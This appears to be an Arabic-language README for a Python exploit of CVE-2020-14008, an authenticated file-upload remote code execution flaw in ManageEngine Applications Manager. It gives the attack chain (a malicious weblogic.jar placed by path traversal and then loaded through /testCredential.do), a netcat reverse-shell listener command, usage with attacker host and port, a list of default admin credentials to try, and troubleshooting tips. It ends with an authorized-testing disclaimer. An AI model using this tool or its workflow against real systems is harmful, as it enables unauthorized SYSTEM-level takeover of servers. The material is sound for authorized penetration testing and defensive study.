
CVE-2020-14008 - ManageEngine Applications Manager RCE
تنفيذ الأوامر عن بعد بعد المصادقة عبر تحميل ملف تعسفي في Zoho ManageEngine Applications Manager (الإصدارات <= 14720).
| التفاصيل | القيمة |
|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (عالي) |
| النوع | RCE بعد المصادقة / تحميل ملف تعسفي |
| المنتج | Zoho ManageEngine Applications Manager |
| المتأثر | الإصدار 14720 وما دونه |
| المتطلب | بيانات اعتماد مسؤول صالحة |
| النتيجة | وصل عكسي على مستوى النظام (SYSTEM) |
يستغل الهجوم ميزة اختبار بيانات اعتماد مراقب Weblogic. يقوم مسؤول مصادق بتحميل ملف weblogic.jar خبيث إلى مسار مكتبة Weblogic المتوقع. عند تشغيل اختبار بيانات الاعتماد، يقوم ManageEngine بتحميل weblogic.jndi.Environment من JAR المُحمَّل عبر JarLoader.loadClass() و newInstance()، مما ينفذ كود Java تعسفيًا.
javac و jar في PATH)nc (netcat) لاستقبال الوصلة العكسيةpip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>
# أساسي
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment) تحتوي على وصل عكسي داخل weblogic.jarclasses/weblogic/version8/ عبر اجتياز الدليل (النسخ الاحتياطي: إنشاء مهمة مجدولة لنقلها)/testCredential.do، الذي يقوم بتحميل وإنشاء مثيل للفئة الضارة| اسم المستخدم | كلمة المرور |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| الخطأ | الإصلاح |
|---|---|
release version 7 not supported | Java 21+ أسقط هدف Java 7. يستخدم السكربت --release 8 |
FileNotFoundError: weblogic.jar | فشل تجميع JAR. تحقق من وجود javac و jar في PATH |
No valid response from used session | بيانات اعتماد غير صالحة |
Actionname not found | فشل إنشاء المهمة، تحقق من صلاحيات المسؤول |
هذه الأداة مقدمة لاختبار الاختراق المصرح به والبحث الأمني فقط. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن لاختبارها غير قانوني.